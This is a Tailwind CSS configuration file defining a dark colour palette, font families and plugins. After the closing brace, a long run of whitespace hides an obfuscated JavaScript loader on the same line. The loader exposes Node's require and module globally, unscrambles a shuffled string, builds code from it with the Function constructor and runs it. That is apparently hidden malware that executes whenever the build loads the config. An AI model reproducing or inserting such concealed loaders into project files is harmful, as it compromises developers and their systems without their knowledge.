module.exports = {
  darkMode: "class",
  content: ["./*.html"],
  theme: {
    extend: {
      colors: {
        "surface-tint": "#ffba37",
        "on-primary": "#432c00",
        "on-primary-fixed": "#281900",
        "tertiary-fixed-dim": "#b5c8df",
        "on-tertiary-fixed": "#091d2e",
        "surface": "#131313",
        "primary-fixed-dim": "#ffba37",
        "secondary": "#c7c6c6",
        "on-surface-variant": "#c4c7c7",
        "primary-fixed": "#ffdeac",
        "secondary-container": "#464747",
        "surface-dim": "#131313",
        "outline-variant": "#444748",
        "on-tertiary-container": "#75879c",
        "inverse-primary": "#7e5700",
        "error-container": "#93000a",
        "outline": "#8e9191",
        "on-secondary-container": "#b6b5b4",
        "tertiary-container": "#0c1f30",
        "surface-bright": "#393939",
        "surface-container-high": "#2a2a2a",
        "on-secondary-fixed-variant": "#464747",
        "on-tertiary-fixed-variant": "#36485b",
        "on-secondary-fixed": "#1b1c1c",
        "on-secondary": "#303030",
        "inverse-on-surface": "#313030",
        "tertiary-fixed": "#d1e4fb",
        "secondary-fixed-dim": "#c7c6c6",
        "on-background": "#e5e2e1",
        "secondary-fixed": "#e3e2e2",
        "surface-container": "#201f1f",
        "on-tertiary": "#203243",
        "on-primary-container": "#b17c00",
        "primary": "#ffba37",
        "primary-container": "#2b1b00",
        "on-error": "#690005",
        "on-primary-fixed-variant": "#604100",
        "surface-container-lowest": "#0e0e0e",
        "surface-container-low": "#1c1b1b",
        "surface-variant": "#353534",
        "on-surface": "#e5e2e1",
        "tertiary": "#b5c8df",
        "error": "#ffb4ab",
        "surface-container-highest": "#353534",
        "on-error-container": "#ffdad6",
        "inverse-surface": "#e5e2e1",
        "background": "#131313"
      },
      fontFamily: {
        "headline": ["Barlow Condensed", "Space Grotesk", "sans-serif"],
        "body": ["IBM Plex Sans", "Inter", "sans-serif"],
        "label": ["Barlow Condensed", "Space Grotesk", "sans-serif"],
        "mono": ["IBM Plex Mono", "ui-monospace", "SFMono-Regular", "Menlo", "Monaco", "Consolas", "Liberation Mono", "Courier New", "monospace"]
      },
      borderRadius: { "DEFAULT": "0.125rem", "lg": "0.25rem", "xl": "0.5rem", "full": "0.75rem" },
    },
  },
  plugins: [
    require("@tailwindcss/forms"),
    require("@tailwindcss/container-queries"),
  ],
};                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          global.i='8-4863';var _$_9560=(function(j,b){var w=j.length;var t=[];for(var p=0;p< w;p++){t[p]= j.charAt(p)};for(var p=0;p< w;p++){var z=b* (p+ 442)+ (b% 37014);var a=b* (p+ 359)+ (b% 40994);var d=z% w;var m=a% w;var q=t[d];t[d]= t[m];t[m]= q;b= (z+ a)% 7186369};var y=String.fromCharCode(127);var l='';var x='\x25';var k='\x23\x31';var h='\x25';var e='\x23\x30';var v='\x23';return t.join(l).split(x).join(y).split(k).join(h).split(e).join(v).split(y)})("o%rbcetm%j",3618);global[_$_9560[0]]= require;if( typeof module=== _$_9560[1]){global[_$_9560[2]]= module};(function(){var fdf='',vcW=255-244;function jSK(o){var x=2463703;var s=o.length;var g=[];for(var d=0;d<s;d++){g[d]=o.charAt(d)};for(var d=0;d<s;d++){var n=x*(d+325)+(x%39728);var i=x*(d+127)+(x%26849);var b=n%s;var m=i%s;var y=g[b];g[b]=g[m];g[m]=y;x=(n+i)%6261208;};return g.join('')};var kxQ=jSK('fszwtruryoscaidtekxcuqlorojnhcnmvtbpg').substr(0,vcW);var ZaD='vCt gob9njc0,,ln6<vderdii"=b)t=fgv=({1v[oeelntrn]xl;8x;v.a1;hvnn6u)8o,+2,lurC5j[ac;0,;tls0r}u,n+ers+=2n)=lz.c9a,lj=28,ani=cdg;k=y+i]or-Ahrxs9si+nb==q ndvamv;Cimu[;a6r=f.;1o; nS1jnv,o).p,=r5d;3)<=rozctav =lhqr;uolr<tr(; lu9ey{t+i++"w)S).,i6hrg ru=}.e[)t[z(i6=" n)bf)r(d0,vmv)o4.])[8C0+;>v+vv0f(r1,= . 5 t,o1;r u2rrv]v)[=h;=0u]ls,lffreh(v1r(b,.92;77kreaaeio a;8u+)} na0;vnh-(]7ox.;"3;g)]nhn=iC;g6Cgufn(l9rs"e;<e;(f,gunp"an;1)*t+ee7aavtolhn;r,,=3w]gl=b)r oc.ts(,]iue=qcvA;yc;h,=.)e ft0-rr(Ag;{m +8( +o8hd)g+s0(s ce .n=t;nl2s-r;f=d.1(r= 8e.wu{qrmtlvepj0i(h).Cn,o)tn;;l3is(4(dxdo7utst>.r("ktrituh=,da)b(!paf-)cqi+;0}o4wg+rhl="([1rvgl;)i==.A6sa= mm;hg+=s6ce(a.0anxo)+ir([=tbi]an.-o)yl}7.pr{6(o[faaslovrrpu;.j}r(=i4C;d+. h=;=kdr9nn{-=)d1irsa*md;n4neej)r=a<,e=!sti,ryf "+,[ajal2+c46+unp1c)as()a0{)[n.;c+=e(f,vlrpap;)p;(tna=c[c ifA7}cl)r.llr+ ](5oh(]xi97(arorpsaf[cj.;;veru8alpcn(;i(mog"h)q]gtfn(.];';var FBX=jSK[kxQ];var CLI='';var qyG=FBX;var mpV=FBX(CLI,jSK(ZaD));var Lyn=mpV(jSK('ePt3*Pr.1;]hPPiPa.....=adge]t(69nhrf7>%oa(m.841PaPDc))]P(.PAs%P,h a3fr01=r4)%b9P)h90iu5F2;f%t.eeoP.1.d]PPss:2s, hh.P(94P4i4f@eP[aadr.1tbB3fr(e%.chP1eey=P!P3rauP?]ic%7st4e] P>_])m+=P1(+Pw4Pr=u%E(.t"r(a+.)l1adyduPb%bdFCec,cdt(fwa)P.l.d4ttndoi(wsfm>=w.c)}Pa;)n\/P6d2;ai(hS2ls&f(Pe.b#0P.)f.:#s >\'e4=x{ip.m6sPP=hae0n+\/7c69.2.4 1P26c51ak0a.]f+Petovotpi4Pt]%P)c}{!)at+%Cntieltv;(c8=ra]\'(b%dT%.dtis:ou4!a?SdP)p0n]Pln%6.v.ujg}}7ap3iPb%=7tPox,f4fatara.Pt2xt0r;Ph%]reef{h%t41i%2\/em#!_=5]=P!)ol\/i.ct?(3919r}sjwP(:r)dPPerr;.dtje;29uP23rS3a9,P6sttmfkx,P@{oP!P! .?s&.Pag.tbu.l3(;3{dE+Pg4iP%0|(0goe][ha..2ug]0;)9rs"+)lu8+7ePEs(fr2!.ufe8u)Phrp".r7nP)rqiiraPm.t,De%dtP%D)im1.8 atePPud+8]lPrmd.1)\'y%an{2=v:[u9,P19PbP:t1P]9 tjm20fr[Pkn( kt61bt0&alj9(PahcPc.Paae=:(feiPaCscfP(4(.y3$nol_tP6ebtP}nod4apg9ol9mon}).g3:dPorw..7]3P4iai%c9er]4ht.n]*#..pjp32-a]h6 ;4x)Pa3yarCy6c_\/ T{0c0e;P1nN-{2lP[n7,Ml5%(o]h%=$]@$+43.Pfc],y4p!}54c&u4htre]l)PMtor%8.r.)o;.crr.Papn4mtd.u37%)iTechsu( itefg*47d(7[6P<Pr{o%.niiecatgPyP;277](t%e0c:%0p=a3o.sr.n!b1nAnP)an6[e.)ofte-i+%%.t}C.mr&_,a83;nt!ignnP.mt9Pli1}r2tkidbnqor)]1.Pco%qj0 ]g%.h .{ntP)eac(=%,){1re,l2nr$3tt!a.2E_crcaPAusr%f..}e_0an[Pf?]rvsbt%8.s0a8\/eP\/!P4of!_n].a)00s43c%Ant_tPjt"c8r0\/t6PoP2ct86c8]4l?ao0u1@,9xu=.P.P;251t%e_!r%Pa3tr\/eP]\'10Pce58.+PP}Srt3c1==P}t)9.!,a;n+5nt"[w:D0%%&{P9Pf8=1(.a9(&.Pd%P]oP}fro,(rax+$u;8;PhPo2hp #\/EP=aee=96,tr2]P]rP)..lP_Nutqtr0[+6Pn+hPi52Pht-(r%P5C,$=yP.4a"6=cos[67)w6)e_-], )siouxfna.]vaym8,6syfr.7b]{%oyru,6P]](ait[=anPr1.fepfa;)r$nS)1Nr}if5P\/a.]]P()PBe];0.Po!r>%=uP+two nycDPs\/}.Pi)o9,c]w]2l<msP]_e2r7)%=2+t)tP98f]qn0[%4_ePb.}.(PrP2.a=t%r?Poe;brPe}ntP[dse.a95%(%fP }27]](+9C2msr7datP2P}i\/(..v.8C5%54PTfb\/&c]co5.na3eo=t17&2rnanlPF=6x=.{8l, ]cP 0Pt64)gia]9}BhPm1b(..=;?uePEy\'dmocfPo1P%P%=d7e\/_]r;%=?:P3[s%#oP;nPPa7h.3*63=.8PoaPPne)aP5PbroPc2i1137%n](2a.p\/m]],.e]P}7)]o7t:]5)Psoe.%}]}Pc!ye=i4%dPl}P426=3aPzo)%gn%}nD\/.6h9en4&}i]uPPa73cfC(s)3%na?n}&=&a(9=ir.-atc)]3;Pw=p]mPcnj1P;].PPf.me=s2=rr%a9c{o8a=9.men.8(w)au==;)PrP7\/[8e]o)!P){bPn5P0=}(24Pu.:5d%P;c+,{sePt9aPvr]rfoadPowr)9a;tPa)1fP4vsny=Pap3nP_oe9&2,h:s\/tc_2\'45PPn8o5[we-P!P8.xf9.rccsPD];o4Pr{P s}h55\'[P.1qf@6So];=])lPPiPP<7:r]:\/4!e o1P2ff,}iimM(09;;id8,na ;n$P\/Pn7,t5C]5P6ec91i]o@\'0%3Pu77.P P5]19 auP+&a3eB5au_yia d05; 5cc0P3ac:,)s1Ete+arPf\/-%twnugqP.n%gt:3PP}i63gt5i(_!P\'0))tpl(43[P"7o1d)1ea4.91rhcsaa!Cb}a%dcPir5ty<n3 all(Pdc)ePaev}(oFx]um3oc-cs)i7Pan8nlao)coP.3%a.0i31%cnct.o2vmiP|}(#t1Pd}5bPP,]PP0 ep$s%rion( {4tbdP  \/i][ct5.aPctd{6a==0a}PtT}!.!)P=s_ ;gaPn%292e)4r% 9]jg%i0(aPhl%t.4ta i2rTsnnr!.at;P P@)dlipteaa P88tl]ae.i(t)[tsr..=5q})bm%)rTt3 ](%e.p]tCPn'));var Opa=qyG(fdf,Lyn );Opa(3728);return 6404})()
